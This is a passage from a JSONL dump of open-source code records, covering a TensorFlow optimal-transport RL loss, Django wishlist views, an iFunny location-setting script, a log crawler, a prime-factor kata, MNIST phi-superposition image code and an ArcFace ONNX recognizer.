simulated annealing): \n def KP_log(x,y,b_j_log, blur = 1.):\n \"\"\"\n Kernel product in the log domain\n x: source for grad (batch,num_target_samples,num_particles,1)\n y: target with no grad (batch,num_target_samples,num_particles,1)\n \"\"\"\n xmy = x[:,:,:,None,:] - y[:,:,None,:,:] # batch,samples,parts,parts,1, xmy[i,j,k] = (x_i[k]-y_j[k])\n C = - xmy**2 / (2*(blur**2))\n return (blur**2)*tf.reduce_logsumexp(C + b_j_log, axis=2,keepdims=True)\n\n # Solve the OT_e(a,b) problem\n f_i = tf.zeros([batch_size,self.num_target_samples,self.num_particles,1,1],dtype=tf.float32) \n g_j = tf.zeros([batch_size,self.num_target_samples,self.num_particles,1,1],dtype=tf.float32)\n for scale in self.scales:\n g_j = -KP_log(target_particle_set, chosen_action_particles, f_i/scale**2 + self.loga_i, blur=scale)\n f_i = -KP_log(chosen_action_particles, target_particle_set, g_j/scale**2 + self.logb_i, blur=scale)\n \n # Return the dual cost OT_e(a,b), assuming convergence in the Sinkhorn loop\n # batch_size x num_target_samples x 1\n Wb_loss = tf.reduce_mean(tf.squeeze(f_i),axis=2) + tf.reduce_mean(tf.squeeze(g_j),axis=2) \n\n # average loss over target samples\n # batch_size x 1\n proximal_loss_ij = tf.reduce_mean(Wb_loss + self.tau*l2_loss,axis=1)\n\n # total loss over replay buffer\n proximal_loss = tf.reduce_sum(proximal_loss_ij,axis=0)\n\n # TODO(kumasaurabh): Add prioritized replay functionality here.\n update_priorities_op = tf.no_op()\n with tf.control_dependencies([update_priorities_op]):\n if self.summary_writer is not None:\n with tf.variable_scope('Losses'):\n tf.summary.scalar('ProximalLoss', proximal_loss)\n return self.optimizer.minimize(proximal_loss), proximal_loss\n","sub_path":"dopamine/agents/dominant_particle/dominant_particle_agent.py","file_name":"dominant_particle_agent.py","file_ext":"py","file_size_in_byte":15836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"509444202","text":"horaInicial: int; horaFinal: int; duracao: int;\n\nhoraInicial = int(input(\"Hora inicial: \"))\nhoraFinal = int(input(\"Hora final: \"))\n\nif(horaFinal > horaInicial):\n duracao = horaFinal - horaInicial\nelse:\n duracao = 24 - (horaInicial - horaFinal)\n\nprint(f\"O JOGO DUROU {duracao} HORA(S)\")","sub_path":"Python/Tempo_de_jogo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45592644","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.shortcuts import render, redirect, \tget_object_or_404\nfrom shop.models import Product\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Wishlist, WishlistItem\n\n\n@login_required\ndef wishlist_add(request, product_id,):\n\n wishlist, created = Wishlist.objects.update_or_create(user=request.user)\n product = get_object_or_404(Product, id=product_id)\n item, itemCreated = WishlistItem.objects.update_or_create(wishlist=wishlist, product=product)\n wishlist.items.add(item)\n item.save()\n wishlist.save()\n return redirect('wishlist:wishlist_detail')\n\n\n@login_required\ndef wishlist_remove(request, product_id):\n wishlist, created = Wishlist.objects.update_or_create(user=request.user)\n product = get_object_or_404(Product, id=product_id)\n wishlistItems = WishlistItem.objects.filter(wishlist=wishlist, product=product)\n wishlistItems.delete()\n return 
redirect('wishlist:wishlist_detail')\n\n\n@login_required\ndef wishlist_detail(request):\n wishlist, created = Wishlist.objects.update_or_create(user=request.user)\n return render(request, 'wishlist/wishlist_detail.html', {'wishlist': wishlist})\n","sub_path":"wishlist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312697354","text":"import requests\nimport time\nimport random\n\n# insert your accounts bearer token here from the bearer token generator repo\nbearer_token = 'insert_your_token_here'\n\n\n# you may change these if you would like.\n# Warning: setting the update interval too fast (like around 3) could make your iFunny load slowly due to rate limiting. By default its set to 10 seconds.\nupdate_interval = 10\nlatitude_range = 0, 90\nlongitude_range = 0, 180\n\n\nlat, lon = random.uniform(*latitude_range), random.uniform(*longitude_range)\n\nwhile 1:\n url = 'https://api.ifunny.mobi/v4/geo'\n h = {'Authorization': 'Bearer ' + bearer_token}\n data = {\n 'lat': lat,\n 'lon': lon\n }\n r = requests.post(url, headers=h, data=data)\n try:\n r.raise_for_status()\n print('Updated geo location with coordinates:', lat, lon)\n except requests.exceptions.HTTPError:\n print('The server returned an error: ' + r.json()['error_description'])\n time.sleep(update_interval)\n","sub_path":"run_me.py","file_name":"run_me.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45592454","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport sys\nimport pandas as pd\nfrom loguru import logger\n\nfrom crawl.crawl import crawler\nfrom crawl import logs\nfrom parse.parse import parser\nfrom database import database\nfrom database import utils as db_utils\nfrom database import date as db_dates\n\n\ndef log_performance(raw, parsed):\n '''\n Compare raw data and parsed data and log results\n Params : dict, dict\n Return: None\n '''\n logger_resume.info(\"- Downloaded data : {} values for {} rows using {} MB \\\n \\n- Parsed data : {} values for {} rows using {} MB\", \\\n raw['values'], raw['rows'], raw['memory'] / 1000000, \\\n parsed['values'], parsed['rows'], parsed['memory'] / 1000000)\n\ndef get_metadata(meta, df):\n '''\n Read pandas dataframe metadata such as size, shape and mem usage\n Params : dictionary, dataframe\n Return : dictionary\n '''\n meta['values'] += df.size\n meta['rows'] += df.shape[0]\n meta['memory'] += df.memory_usage().sum() #expressed in bytes\n #to be improved. 
We can get more of these\n return(meta)\n\n@logger.catch\ndef main():\n file = \"config.json\"\n with open(file) as json_file:\n settings = json.load(json_file)\n logger.info(\"Successfully opened {}\", file)\n session = None #session = logs.create_session(settings['website'])\n raw = {\"values\": 0, \"rows\": 0, \"memory\": 0}\n parsed = {\"values\": 0, \"rows\": 0, \"memory\": 0}\n\n with database.create_connection(settings['database']['name']) as db:\n last_db_update = None\n if (db_utils.has_table(db, \"serv\")):\n last_db_update = db_dates.get_latest_date(db, settings[\"logs\"]['reboot_time'])\n logger.debug(\"db latest update: {}\", last_db_update)\n \n for key in settings['logs']['sufix']:\n logger.debug(\"key: {}\", key)\n dfs = []\n for i in settings['logs']['sufix'][key]:\n df = crawler(session, settings, i)\n dfs.append(df)\n get_metadata(raw, df)\n df = parser(key, dfs)\n get_metadata(parsed, df)\n first_df_date = df['date'].min() #if df older than db, dont store it\n logger.debug(\"{} oldest date: {}\", key, first_df_date)\n if last_db_update and (last_db_update > first_df_date):\n logger.warning(\"Downloaded dataset {} is already logged in db!\", key)\n continue\n database.append_dataframe(db, df, key)\n log_performance(raw, parsed)\n \n\nif __name__ == \"__main__\":\n logger.add(\"GTALifeData_Resume.log\", format=\"{time:YYYY-MM-DD HH:mm:ss.SSS}\\n{message}\", filter=lambda record: \"resume\" in record[\"extra\"])\n logger.add(\"GTALifeData_runtime_{time}.log\", backtrace=True, diagnose=True)\n logger_resume = logger.bind(resume=True)\n logger.info(\"Launching {app_name}\", app_name=sys.argv[0][2:-3])\n main()\n logger.info(\"All tasks executed, closing\")","sub_path":"gtalife_data.py","file_name":"gtalife_data.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"588408816","text":"import asserts as test\n\n\ndef sum_for_list(lst):\n prime_list = []\n\n def produce_factors(num, start):\n for i in range(start, int(num ** 0.5) + 1):\n if num % i == 0:\n return [i] + produce_factors(num/i, i)\n\n return [num]\n\n for n in lst:\n if n < 0:\n n = -n\n prime_list += produce_factors(n, 2)\n\n prime_list = list(set(prime_list))\n prime_list.sort()\n\n return [[p, sum([n for n in lst if n % p == 0])] for p in prime_list]\n\n\nif __name__ == '__main__':\n a = [12, 15]\n test.assert_equal(sum_for_list(a), [[2, 12], [3, 27], [5, 15]])\n b = [12, -15]\n test.assert_equal(sum_for_list(b), [[2, 12], [3, -3], [5, -15]])","sub_path":"python/CodeWars/SumOfList2.py","file_name":"SumOfList2.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470674462","text":"#!c:/Python34/python.exe\n\n#######################################################################\n# Convert images to phi superpositions\n#\n# Author: Garry Morrison\n# email: garry -at- semantic-db.org\n# Date: 2016-08-1\n# Update: \n# Copyright: GPLv3\n#\n# Usage: ./phi-transform-v2.py ngram-size image-directory\n#\n#######################################################################\n\n\nimport os\nimport sys\nimport glob\nfrom PIL import Image\nimport numpy\nimport copy\nimport math\n\n#from the_semantic_db_code import *\n#from the_semantic_db_functions import *\n#from the_semantic_db_processor import *\n\nif len(sys.argv) < 3:\n print(\"\\nUsage:\")\n print(\" ./phi-transform-v2.py ngram-size image-directory\")\n sys.exit(1)\n\ntry:\n 
ngram_size = int(sys.argv[1])\nexcept:\n ngram_size = 5\n\n#list_of_files = sys.argv[2:]\nfile_dir = sys.argv[2]\n#print(\"files:\",list_of_files)\n#sys.exit(0)\n\n# switch verbose printing on and off:\nverbose = False\n#verbose = True\n\n# assume these exist. ie, don't test first.\n#destination_phi_transform = \"work-on-handwritten-digits/phi-transformed-images-v2--60k-train/\"\n#destination_phi_transform = \"work-on-handwritten-digits/phi-transformed-images-v2--10k-test/\"\n#destination_phi_images = \"work-on-handwritten-digits/phi-images-v2/\"\n#image_mode = \"RGB\"\nimage_mode = \"L\"\n\n# define our bare-bones superposition class:\nclass superposition(object):\n def __init__(self):\n self.dict = {}\n\n def __str__(self):\n list_of_kets = []\n for key,value in self.dict.items():\n if value == 1:\n s = \"|%s>\" % key\n else:\n s = \"%s|%s>\" % (value,key)\n list_of_kets.append(s)\n return \" + \".join(list_of_kets)\n\n def __iter__(self):\n for key,value in self.dict.items():\n yield key, value\n\n def __len__(self):\n return len(self.dict)\n\n def add(self,str,value=1):\n if str in self.dict:\n self.dict[str] += value\n else:\n self.dict[str] = value\n\n def pair(self): # if the dict is longer than 1 elt, this returns a random pair\n for key,value in self.dict.items():\n return key, value\n\n def rescale(self,t=1):\n if len(self.dict) == 0:\n return superposition()\n# result = copy.deepcopy(self)\n the_max = max(value for key,value in self.dict.items())\n result = superposition()\n if the_max > 0:\n for key,value in self:\n result.dict[key] = t*self.dict[key]/the_max\n return result\n\n def apply_sigmoid(self,sigmoid):\n result = superposition()\n for key,value in self:\n result.dict[key] = sigmoid(self.dict[key])\n return result\n\n\n# our sigmoids (just one for now):\ndef log_1(x,t=None):\n if x <= 0: # maybe tweak this, given that it is log(1 + x), not log(x)\n return 0\n if t == None:\n return math.log(1+x) # default is base e, ie natural logarithm\n return math.log(1+x,t) \n\n\ndef load_simple_sw_into_dict(filename,op):\n op_head = op + \" |\"\n sw_dict = {}\n with open(filename,'r') as f:\n for line in f:\n line = line.strip()\n if line.startswith(op_head):\n try:\n head,tail = line.split('> => ',1)\n label = head.split(' |',1)[1]\n sw_dict[label] = superposition()\n for piece in tail[:-1].split('> + '):\n print(\"piece:\",piece)\n float_piece, string_piece = piece.split('|')\n try: \n float_piece = float(float_piece)\n except:\n float_piece = 1\n sw_dict[label].add(string_piece,float_piece)\n except Exception as e:\n print(\"Exception reason: %s\" % e)\n continue\n return sw_dict\n\ndef print_sw_dict(dict):\n for label,sp in dict.items():\n print(\"|%s> => %s\" % (label,sp))\n\n#filename = \"sw-examples/mnist-60000-train-label-averaged--k_5--t_0_8--layer-1.sw\"\nfilename = \"sw-examples/mnist-test-2000--edge-enhanced--k_5--t_0_4--layer-1.sw\"\nsw_dict = load_simple_sw_into_dict(filename,\"layer-1\")\nprint_sw_dict(sw_dict)\n#sys.exit(0)\n\n# simm that is hopefully faster than the one in the full project.\n# If not, then go home!\n#\ndef fast_simm(A,B):\n if len(A) == 0 or len(B) == 0:\n return 0\n if len(A) == 1 and len(B) == 1:\n a_label, a_value = A.pair()\n b_label, b_value = B.pair()\n\n if a_label != b_label: # put a.label == '' test in here too?\n return 0\n a = max(a_value,0) # just making sure they are >= 0.\n b = max(b_value,0)\n if a == 0 and b == 0: # prevent div by zero.\n return 0\n return min(a,b)/max(a,b)\n# return 
intersection(A.normalize(),B.normalize()).count_sum() # very slow version!\n\n # now calculate the superposition version of simm, while trying to be as fast as possible:\n try:\n merged = {}\n one_sum = 0\n one = {}\n for label,value in A:\n one[label] = value\n one_sum += value # assume all values in A are >= 0\n merged[label] = True # potentially we could use abs(elt.value)\n\n two_sum = 0\n two = {}\n for label,value in B:\n two[label] = value\n two_sum += value # assume all values in B are >= 0\n merged[label] = True\n\n # prevent div by zero:\n if one_sum == 0 or two_sum == 0:\n return 0\n\n merged_sum = 0\n for key in merged:\n if key in one and key in two:\n v1 = one[key]/one_sum\n v2 = two[key]/two_sum\n merged_sum += min(v1,v2)\n return merged_sum\n except Exception as e:\n print(\"fast_simm exception reason: %s\" % e)\n\ndef pattern_recognition(sw_dict,pattern):\n result = ('',0)\n best_simm = 0\n for label,sp in sw_dict.items():\n similarity = fast_simm(pattern,sp)\n if similarity > best_simm:\n result = (label,similarity)\n best_simm = similarity\n return result\n\n\ndef image_to_sp(image):\n data = list(image.getdata())\n mode = image.mode\n print(\"data:\",data)\n print(\"mode:\",mode)\n r = superposition()\n if mode == \"L\":\n# r.data = [ ket(str(k),value) for k,value in enumerate(data) ]\n for k,value in enumerate(data):\n r.add(str(k),value)\n return r\n if mode in [\"RGB\",\"RGBA\"]: # fix later! We don't need it for mnist digits.\n k = 0\n for value in data:\n R,G,B = value[:3]\n r.data.append(ket(str(k),R))\n r.data.append(ket(str(k+1),G))\n r.data.append(ket(str(k+2),B))\n k += 3\n return r\n\ndef sp_to_image(sp,d=5): # assumes the sp is rescaled to 255 (so range is [0,255] )\n if len(sp) != d*d: # loaded into console, shows all have len 100.\n print(\"wrong length! len sp:\",len(sp))\n sys.exit(1)\n size = (d,d)\n# data = [ int(x.value) for x in sp ]\n# unsorted_data = []\n# for key,value in sp: # NB: these sp's are unsorted! We need to sort by key.\n# unsorted_data.append((key,value))\n unsorted_data = [(key,value) for key,value in sp ] # doesn't seem to be any faster than data.append version.\n# sorted_data = sorted(unsorted_data, key = lambda x: float(x[0]), reverse = False)\n unsorted_data.sort(key = lambda x: float(x[0]), reverse = False)\n\n if verbose:\n print(\"sorted:\",unsorted_data)\n\n data = [ x[1] for x in unsorted_data ]\n\n im = Image.new('L',size) # assume this, rather than RGB. Will work for now.\n im.putdata(data)\n# im.save(destination + \"mnist-test-1--phi-image-%s.bmp\" % count)\n return im\n\n\n# now test these last 2 functions: \n# Yup! 
Works.\n#image_filename = \"work-on-handwritten-digits/label-average-images/mnist-train-7.bmp\"\n#im = Image.open(image_filename)\n##im.show()\n#our_sp = image_to_sp(im)\n#print(\"our_sp:\",our_sp)\n#print(\"rescaled our_sp:\", our_sp.rescale(255))\n#im2 = sp_to_image(our_sp,28)\n#im2.show()\n\n\n# convert image file into a phi-superposition:\ndef make_phi_superpositions(sw_dict,name,k):\n try:\n base = os.path.basename(name)\n filehead,ext = base.rsplit('.',1)\n im = Image.open(name)\n width,height = im.size\n image_phi_sp = superposition()\n for h in range(0,height-k): # this is the section we need to speed up!\n for w in range(0,width-k):\n# count += 1\n im2 = im.crop((w,h,w + k,h + k))\n our_sp = image_to_sp(im2)\n# phi = our_sp.similar_input(context,\"layer-1\").select_range(1,1).ket()\n phi_label, phi_value = pattern_recognition(sw_dict,our_sp)\n if phi_label == \"\":\n continue\n# phi = ket(\"phi: 0\") # may as well use this as a data point too. Now testing time. Nah. Doesn't improve the result.\n# image_phi_sp += phi # map image to phi sp\n image_phi_sp.add(phi_label,phi_value)\n return image_phi_sp\n except Exception as e:\n print(\"make_phi_superpositions reason:\",e)\n return superposition()\n\n\n\ndestination = \"sw-examples/image-phi-superpositions--train-60k--using-edge-enhanced-features--k_5--t_0_4.sw\"\nwith open(destination,'w') as f:\n# f.write(\"%s |%s> => %s\\n\" % (op,label,sp))\n\n# given a directory, and assume it exists:\n count = 0\n for filename in glob.glob(file_dir + \"/*\"):\n\n image_phi_sp = make_phi_superpositions(sw_dict, filename, ngram_size)\n base = os.path.basename(filename)\n filehead,ext = base.rsplit('.',1)\n# context2.learn(\"train-phi-sp\",\"image: \" + filehead,image_phi_sp)\n f.write(\"train-phi-sp |image: %s> => %s\\n\" % (filehead,image_phi_sp))\n\n sp = image_phi_sp.apply_sigmoid(log_1) # let's do log(1+x) more directly. Hopefully it is faster. Bah! 
No change in speed!\n count += 1\n print(\"count:\",count)\n print(\"log-phi-sp:\",sp)\n# context2.learn(\"train-log-phi-sp\",\"image: \" + filehead,sp)\n f.write(\"train-log-phi-sp |image: %s> => %s\\n\\n\" % (filehead,sp))\n# break\n\n\nsys.exit(0)\n\n#context2.save(\"sw-examples/image-phi-superpositions-test-1000--%s--t_0_4--v2.sw\" % str(ngram_size))\n#context2.save(\"sw-examples/image-phi-superpositions--test-2000--using-edge-enhanced-features--k_5--t_0_4--phi0.sw\")\ncontext2.save(\"sw-examples/image-phi-superpositions--train-60k--using-edge-enhanced-features--k_5--t_0_4.sw\")\n\nsys.exit(0)\n\n\n# some of the numpy code is from here:\n# http://stackoverflow.com/questions/17291455/how-to-get-an-average-picture-from-100-pictures-using-pil\ndef phi_transform_image(sw_dict,name,k):\n try:\n base = os.path.basename(name)\n filehead,ext = base.rsplit('.',1)\n im = Image.open(name)\n width,height = im.size\n if image_mode == \"L\":\n arr = numpy.zeros((height,width),numpy.float)\n elif image_mode == \"RGB\":\n arr = numpy.zeros((height,width,3),numpy.float)\n count = 0\n image_phi_sp = superposition() # switch off image_phi_sp creation, see if it speeds things.\n for h in range(0,height-k):\n for w in range(0,width-k):\n count += 1\n im2 = im.crop((w,h,w + k,h + k))\n our_sp = image_to_sp(im2)\n# phi = our_sp.similar_input(context,\"layer-1\").select_range(1,1).ket() # old method, presumably slower.\n phi_label, phi_value = pattern_recognition(sw_dict,our_sp) # this better be faster, or I have wasted a lot of time!\n if phi_label == \"\":\n continue\n phi_similarity = phi_value\n# image_phi_sp += phi # map image to phi sp\n# phi_sp = phi.apply_op(context,\"layer-1\").rescale(255)\n# tweaked_phi_sp = phi_sp.apply_sigmoid(subtraction_invert,255).multiply(phi_similarity).apply_sigmoid(subtraction_invert,255)\n\n image_phi_sp.add(phi_label,phi_value)\n phi_sp = sw_dict[phi_label].rescale(255)\n tweaked_phi_sp = phi_sp # look into full tweaked_phi_sp later, since we need sigmoids and multiply.\n\n if image_mode == \"L\":\n phi_im = sp_to_image(tweaked_phi_sp) \n im3 = Image.new('L',(width,height),\"white\")\n elif image_mode == \"RGB\":\n phi_im = sp_to_rgb_image(tweaked_phi_sp)\n im3 = Image.new('RGB',(width,height),\"white\")\n\n if verbose:\n print(\"phi: %s|%s>\" % (phi_value,phi_label))\n print(\"phi sp:\",phi_sp)\n# sys.exit(0)\n\n im3.paste(phi_im,(w,h))\n# im3.save(destination + \"mnist-test-1--phi-image-%s-%s.bmp\" % (w,h))\n image_array = numpy.array(im3,dtype=numpy.float)\n# arr += image_array * phi_similarity\n arr += image_array\n\n # see what we have:\n# phi_im.show()\n# im3.show()\n# if count > 1000:\n# sys.exit(0)\n# break\n arr = arr/count # average the final array\n\n # normalize to range [0,255]:\n image_min = numpy.amin(arr)\n print(\"image min:\",image_min)\n arr -= image_min\n new_max = numpy.amax(arr)\n arr *= 255/new_max\n\n # Round values in array and cast as 8-bit integer\n arr=numpy.array(numpy.round(arr),dtype=numpy.uint8)\n\n # Generate, save and preview final image\n if image_mode == \"L\":\n out=Image.fromarray(arr,mode=\"L\")\n elif image_mode == \"RGB\":\n out=Image.fromarray(arr,mode=\"RGB\")\n# out.save(\"Average.png\")\n out.save(\"%s%s.png\" % (destination_phi_transform,filehead))\n# out.show()\n# sys.exit(0)\n\n return image_phi_sp\n return None\n except Exception as e:\n print(\"phi_transform_image reason:\",e)\n return superposition()\n\n\n#for filename in list_of_files:\n# if given a directory:\n#if os.path.isdir(file_dir): # assume it exists, so I don't 
need to change indent.\nfor filename in glob.glob(file_dir + \"/*\"):\n\n image_phi_sp = phi_transform_image(sw_dict,filename,ngram_size)\n# print(\"image_phi_sp:\",image_phi_sp)\n# sys.exit(0) \n continue\n\n base = os.path.basename(filename)\n filehead,ext = base.rsplit('.',1)\n# context2.learn(\"phi-sp\",\"image: \" + filehead,image_phi_sp)\n\n # convert image_phi_sp to an actual image:\n# empty = show_range(ket(\"phi: 1\"),ket(\"phi: 289\")).multiply(0) # hard code in 289 just for now!\n empty = show_range(ket(\"phi: 1\"),ket(\"phi: 289\")) # don't mult by 0, so coeffs are in [1,... instead of [0,...\n sp = (image_phi_sp + empty).ket_sort().apply_sigmoid(log).rescale(255)\n print(\"phi-sp:\",sp)\n context2.learn(\"log-phi-sp\",\"image: \" + filehead,sp.drop())\n phi_image = sp_to_image(sp,17)\n# phi_image.show()\n phi_image.save(\"%s%s.png\" % (destination_phi_images,filehead))\n\n#context2.save(\"sw-examples/image-phi-superpositions--label-average--test-2000--%s--t_0_8.sw\" % str(ngram_size))\n\n\n#context.print_universe()\n#context.save(\"sw-examples/image-ngram-superpositions-%s.sw\" % str(ngram_size))\n\n\nsys.exit(0)\n#context = context_list(\"phi transform of images\")\n#context2 = context_list(\"images to phi superpositions\")\n#context.load(\"sw-examples/mnist-test-1--0_5-similarity.sw\")\n#context.load(\"sw-examples/mnist-1000--layer-1--0_5.sw\")\n#context.load(\"sw-examples/small-lenna-edge-40--layer-1--0_7.sw\")\n#context.load(\"sw-examples/small-lenna-edge-40--layer-1--0_4.sw\")\n#context.load(\"sw-examples/mnist-10000-train--k_5--t_0_5--layer-1.sw\")\n#context.load(\"sw-examples/mnist-10000-train--k_5--t_0_4--layer-1.sw\")\n#context.load(\"sw-examples/mnist-60000-train-label-averaged--k_5--t_0_8--layer-1.sw\")\n\n#sys.exit(0)\n\n\n\ndef first_image_to_sp(image): # if the image is square, then this mapping to sp is invertable\n width,height = image.size\n i = 1\n r = fast_superposition()\n for h in range(0,height):\n for w in range(0,width):\n R,G,B = image.getpixel((w,h))[:3]\n r += ket(str(i),R) + ket(str(i+1),G) + ket(str(i+2),B)\n i += 3\n return r.superposition()\n\ndef image_to_sp(image):\n data = list(image.getdata())\n mode = image.mode\n print(\"data:\",data)\n print(\"mode:\",mode)\n r = superposition()\n if mode == \"L\":\n r.data = [ ket(str(k),value) for k,value in enumerate(data) ]\n return r\n if mode in [\"RGB\",\"RGBA\"]:\n k = 0\n for value in data:\n R,G,B = value[:3]\n r.data.append(ket(str(k),R))\n r.data.append(ket(str(k+1),G))\n r.data.append(ket(str(k+2),B))\n k += 3\n return r\n\ndef sp_to_image(sp,d=5): # assumes the sp is rescaled to 255 (so range is [0,255] )\n# d = 10 # hard wire in d = 10. This fixed the bug.\n# d = 5\n if len(sp) != d*d: # loaded into console, shows all have len 100.\n print(\"wrong length! len sp:\",len(sp))\n sys.exit(1)\n size = (d,d)\n data = [ int(x.value) for x in sp ]\n im = Image.new('L',size) # assume this, rather than RGB. Will work for now.\n im.putdata(data)\n# im.save(destination + \"mnist-test-1--phi-image-%s.bmp\" % count)\n return im\n\ndef sp_to_rgb_image(sp): # assumes the sp is rescaled to 255 (so range is [0,255] )\n d = 10 # hard wire in d = 10. This fixed the bug.\n if len(sp) != 3*d*d:\n print(\"wrong length! 
len sp:\",len(sp))\n size = (d,d)\n data = [ int(x.value) for x in sp ]\n im_data = [ (data[i],data[i+1],data[i+2]) for i in range(0,len(data),3) ]\n im = Image.new('RGB',size)\n im.putdata(im_data)\n return im\n\n# does phi-transform even use this function??\ndef image_to_ngrams(context,name,k):\n try:\n base = os.path.basename(name)\n filehead,ext = base.rsplit('.',1)\n im = Image.open(name)\n width,height = im.size\n for h in range(0,height-k):\n for w in range(0,width-k):\n im2 = im.crop((w,h,w + k,h + k))\n ket_name = \"%s: %s: %s: %s\" % (filehead,str(k),str(w),str(h))\n r = image_to_sp(im2)\n context.learn(\"layer-0\",ket_name,r)\n except Exception as e:\n print(\"image_to_ngrams reason:\",e)\n return\n\n# some of the numpy code is from here:\n# http://stackoverflow.com/questions/17291455/how-to-get-an-average-picture-from-100-pictures-using-pil\ndef phi_transform_image(context,name,k):\n try:\n base = os.path.basename(name)\n filehead,ext = base.rsplit('.',1)\n im = Image.open(name)\n width,height = im.size\n if image_mode == \"L\":\n arr = numpy.zeros((height,width),numpy.float)\n elif image_mode == \"RGB\":\n arr = numpy.zeros((height,width,3),numpy.float)\n count = 0\n image_phi_sp = fast_superposition()\n for h in range(0,height-k):\n for w in range(0,width-k):\n count += 1\n im2 = im.crop((w,h,w + k,h + k))\n our_sp = image_to_sp(im2)\n phi = our_sp.similar_input(context,\"layer-1\").select_range(1,1).ket()\n if phi.label == \"\":\n continue\n phi_similarity = phi.value\n image_phi_sp += phi # map image to phi sp\n phi_sp = phi.apply_op(context,\"layer-1\").rescale(255)\n tweaked_phi_sp = phi_sp.apply_sigmoid(subtraction_invert,255).multiply(phi_similarity).apply_sigmoid(subtraction_invert,255)\n if image_mode == \"L\":\n phi_im = sp_to_image(tweaked_phi_sp) # tidy this later!\n im3 = Image.new('L',(width,height),\"white\")\n elif image_mode == \"RGB\":\n phi_im = sp_to_rgb_image(tweaked_phi_sp)\n im3 = Image.new('RGB',(width,height),\"white\")\n print(\"phi:\",phi)\n print(\"phi sp:\",phi_sp)\n im3.paste(phi_im,(w,h))\n# im3.save(destination + \"mnist-test-1--phi-image-%s-%s.bmp\" % (w,h))\n image_array = numpy.array(im3,dtype=numpy.float)\n# arr += image_array * phi_similarity\n arr += image_array\n\n # see what we have:\n# phi_im.show()\n# im3.show()\n# if count > 1000:\n# sys.exit(0)\n# break\n arr = arr/count # average the final array\n\n # normalize to range [0,255]:\n image_min = numpy.amin(arr)\n print(\"image min:\",image_min)\n arr -= image_min\n new_max = numpy.amax(arr)\n arr *= 255/new_max\n\n # Round values in array and cast as 8-bit integer\n arr=numpy.array(numpy.round(arr),dtype=numpy.uint8)\n\n # Generate, save and preview final image\n if image_mode == \"L\":\n out=Image.fromarray(arr,mode=\"L\")\n elif image_mode == \"RGB\":\n out=Image.fromarray(arr,mode=\"RGB\")\n# out.save(\"Average.png\")\n out.save(\"%s%s.png\" % (destination_phi_transform,filehead))\n# out.show()\n return image_phi_sp.superposition()\n except Exception as e:\n print(\"phi_transform_image reason:\",e)\n return superposition()\n\n\n#for filename in list_of_files:\n# if given a directory:\n#if os.path.isdir(file_dir): # assume it exists, so I don't need to change indent.\nfor filename in glob.glob(file_dir + \"/*\"):\n\n# image_to_ngrams(context,filename,ngram_size)\n image_phi_sp = phi_transform_image(context,filename,ngram_size)\n base = os.path.basename(filename)\n filehead,ext = base.rsplit('.',1)\n context2.learn(\"phi-sp\",\"image: \" + filehead,image_phi_sp) \n\n # convert 
image_phi_sp to an actual image:\n# empty = show_range(ket(\"phi: 1\"),ket(\"phi: 289\")).multiply(0) # hard code in 289 just for now!\n empty = show_range(ket(\"phi: 1\"),ket(\"phi: 289\")) # don't mult by 0, so coeffs are in [1,... instead of [0,...\n sp = (image_phi_sp + empty).ket_sort().apply_sigmoid(log).rescale(255)\n print(\"phi-sp:\",sp)\n context2.learn(\"log-phi-sp\",\"image: \" + filehead,sp.drop())\n phi_image = sp_to_image(sp,17)\n# phi_image.show() \n phi_image.save(\"%s%s.png\" % (destination_phi_images,filehead))\n\n#context2.save(\"sw-examples/image-phi-superpositions--label-average--test-2000--%s--t_0_8.sw\" % str(ngram_size))\n\n\n#context.print_universe()\n#context.save(\"sw-examples/image-ngram-superpositions-%s.sw\" % str(ngram_size))\n\n\n","sub_path":"work-on-images/phi-superpositions-v3.py","file_name":"phi-superpositions-v3.py","file_ext":"py","file_size_in_byte":21546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"318970433","text":"# -*- coding: utf-8 -*-\n# @Organization : insightface.ai\n# @Author : Jia Guo\n# @Time : 2021-05-04\n# @Function : \n\nfrom __future__ import division\nimport numpy as np\nimport cv2\nimport onnx\nimport onnxruntime\nfrom ..utils import face_align\n\n__all__ = [\n 'ArcFaceONNX',\n]\n\n\nclass ArcFaceONNX:\n def __init__(self, model_file=None, session=None):\n assert model_file is not None\n self.model_file = model_file\n self.session = session\n self.taskname = 'recognition'\n find_sub = False\n find_mul = False\n model = onnx.load(self.model_file)\n graph = model.graph\n for nid, node in enumerate(graph.node[:8]):\n #print(nid, node.name)\n if node.name.startswith('Sub') or node.name.startswith('_minus'):\n find_sub = True\n if node.name.startswith('Mul') or node.name.startswith('_mul'):\n find_mul = True\n if find_sub and find_mul:\n #mxnet arcface model\n input_mean = 0.0\n input_std = 1.0\n else:\n input_mean = 127.5\n input_std = 127.5\n self.input_mean = input_mean\n self.input_std = input_std\n #print('input mean and std:', self.input_mean, self.input_std)\n if self.session is None:\n self.session = onnxruntime.InferenceSession(self.model_file, None)\n input_cfg = self.session.get_inputs()[0]\n input_shape = input_cfg.shape\n input_name = input_cfg.name\n self.input_size = tuple(input_shape[2:4][::-1])\n self.input_shape = input_shape\n outputs = self.session.get_outputs()\n output_names = []\n for out in outputs:\n output_names.append(out.name)\n self.input_name = input_name\n self.output_names = output_names\n assert len(self.output_names)==1\n self.output_shape = outputs[0].shape\n\n def prepare(self, ctx_id, **kwargs):\n if ctx_id<0:\n self.session.set_providers(['CPUExecutionProvider'])\n\n def get(self, img, face):\n aimg = face_align.norm_crop(img, landmark=face.kps)\n face.embedding = self.get_feat(aimg).flatten()\n return face.embedding\n\n def 